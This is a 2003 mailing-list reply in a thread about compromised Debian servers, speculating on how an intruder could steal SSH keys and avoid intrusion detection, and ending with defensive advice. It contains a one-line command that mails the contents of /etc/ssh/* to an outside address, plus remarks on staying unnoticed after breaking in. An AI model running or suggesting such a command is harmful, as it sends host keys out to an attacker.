keys - Re: Debian Investigation Report after Server Compromises
On Wed, 3 Dec 2003, Carl Fink wrote:
>
> If the system is rooted, it would be trivial to write a replacement
> for ssh (GPG, etc.) that copies your private keys onto the hard drive
> for later retrieval. Definition of "trivial" is: I, a bad
> programmer, could do it.
why copy and get it later ??
why not have the rootkit you modified do the equivalent of:
for each file...
mail -s "hacked box" your-temp-addy@yahoo.com < /etc/ssh/*
- my understanding ... donno if it's right or not ..
if i copy /etc/ssh/host_keys to my laptop,
when i log into debin host box ( example ) that host
will think my latop is the debian dev box since i
could be on my laptop with the same host keys
- in which case, dont lose control of your host files
or you're s.o.l.
- i find it hard to believe its that simple ..
( i havent tried it though .. to spoof another machine )
- i never did undestand why, people wanna run rootkits once they
got in ... ( all it does is trip the various network/host ids )
- leaving the fs intact, as it was, before you got in
will go un-noticed ... but than again, you can't do much
either .. but than gain, there are plenty of fun things
one can do secretly.. w/o tripping the ids
- and the problem is if they are sniffing keystrokes... oh well..
all bets are off for security .. there is none ..
- even mouse clicks wont help
- best place to start..
- assume they have root passwd ... now figure out how to
cover yourself ( ie.. protect your data )
c ya
alvin
Reply to: